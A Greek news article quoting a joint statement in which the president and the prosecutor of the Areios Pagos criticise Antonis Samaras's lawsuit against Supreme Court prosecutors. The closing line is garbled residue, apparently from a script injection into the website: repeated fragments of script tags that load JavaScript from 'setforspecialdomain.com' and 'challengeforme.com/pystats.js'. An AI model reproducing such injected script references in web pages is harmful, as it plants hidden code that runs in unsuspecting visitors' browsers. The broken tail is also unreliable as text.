Αντίδραση του Αρείου Πάγου στη μήνυση Σαμαρά

«Η στοχοποίηση λειτουργών της Δικαιοσύνης βλάπτει το κλίμα νηφαλιότητας»

Στη μήνυση από τον Αντώνη Σαμαρά αντέδρασαν χθες με ανακοίνωσή τους ο πρόεδρος και η εισαγγελέας του Αρείου Πάγου κάνοντας λόγο για στοχοποίηση λειτουργών της Δικαιοσύνης.

Ο Βασίλης Πέππας και η Ξένη Δημητρίου με κοινή ανακοίνωσή τους άσκησαν κριτική στην κίνηση του Αντώνη Σαμαρά να μηνύσει και εισαγγελέα και αντιεισαγγελέα του Αρείου Πάγου και ζητούν νηφαλιότητα και αυτοσυγκράτηση στη δημόσια κριτική των δικαστικών ενεργειών.

Η ανακοίνωση έχει ως εξής:

Ο χειρισµός από τη Δικαιοσύνη υποθέσεων που αφορούν το δηµόσιο συµφέρον και προβληµατίζουν την κοινωνία, γίνεται µε ασφάλεια µόνο µέσα σε ατµόσφαιρα νηφαλιότητας, που προϋποθέτει, µεταξύ άλλων, τήρηση του µέτρου και αυτοσυγκράτηση, κατά την εκφορά δηµόσιου λόγου, κριτικού των δικαστικών ενεργειών.
Η δε θεσµοθετηµένη από την έννοµη τάξη µας λειτουργική ανεξαρτησία της Δικαιοσύνης είναι αποτρεπτική κάθε είδους παρεµβάσεων στο έργο των δικαστικών λειτουργών.
Όµως, ο δηµόσιος λόγος, µε τον οποίο γίνεται προσωπική στοχοποίηση λειτουργών της Δικαιοσύνης, δεν βοηθάει, αλλά βλάπτει τη διατήρηση του κλίµατος νηφαλιότητας που απαιτείται. Άλλωστε, η νοµιµότητα των αποφάσεων και των ενεργειών των λειτουργών της Δικαιοσύνης υπόκειται σε έλεγχο κατά τον θεσµικά προβλεπόµενο τρόπο.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>